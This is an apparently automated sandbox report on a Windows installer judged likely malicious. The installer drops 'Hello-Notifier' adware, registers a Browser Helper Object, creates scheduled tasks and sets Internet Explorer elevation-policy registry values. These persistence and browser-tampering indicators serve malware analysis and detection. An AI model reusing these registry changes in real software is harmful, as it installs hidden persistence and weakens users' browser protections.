Analysis Overview
SHA256
1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25
Threat Level: Likely malicious
The file 1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N was found to be: Likely malicious.
Malicious Activity Summary
Checks for common network interception software
Loads dropped DLL
Reads user/profile data of web browsers
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
ACProtect 1.3x - 1.4x DLL software
Installs/modifies Browser Helper Object
Checks installed software on the system
UPX packed file
Drops file in Program Files directory
Drops file in Windows directory
Program crash
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
NSIS installer
System policy modification
Suspicious use of WriteProcessMemory
Modifies registry class
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-25 22:18
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NSIS installer
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-25 22:18
Reported
2024-10-25 22:21
Platform
win7-20241010-en
Max time kernel
51s
Max time network
57s
Command Line
Signatures
Checks for common network interception software
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-helper.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil.dll | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier.ico | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\background.html | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-updater.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\37928.xpi | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Installer.log | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil64.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil64.dll | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\utils.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\Tasks\Hello-Notifier-codedownloader.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\Hello-Notifier-codedownloader.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\temp_Hello-Notifier-enabler.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\Hello-Notifier-updater.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\Hello-Notifier-enabler.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\Hello-Notifier-enabler.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\temp_Hello-Notifier-enabler.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\Hello-Notifier-updater.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
NSIS installer
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\Hello-Notifier-bg.exe = "8000" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{660BF2E7-F3CE-43D3-96E9-51F45E4EE215} | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppName = "Hello-Notifier-buttonutil64.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A71C09BB-8724-4A9B-B93E-74A8D2DCE38A} | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A71C09BB-8724-4A9B-B93E-74A8D2DCE38A}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\DefaultValue = "PMIL" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{660BF2E7-F3CE-43D3-96E9-51F45E4EE215}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{65021441-ED41-4725-8921-AF5CACAE92F6}\Policy = "3" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{65021441-ED41-4725-8921-AF5CACAE92F6}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\CheckedValue = "PMIL" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5EFA9B9B-8BA5-4DD0-AA9F-7802DC493E}\Policy = "3" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Approved Extensions | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppName = "Hello-Notifier-buttonutil64.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5EFA9B9B-8BA5-4DD0-AA9F-7802DC493E}\AppName = "Hello-Notifier-enabler.exe-codedownloader.exe" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5EFA9B9B-8BA5-4DD0-AA9F-7802DC493E}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
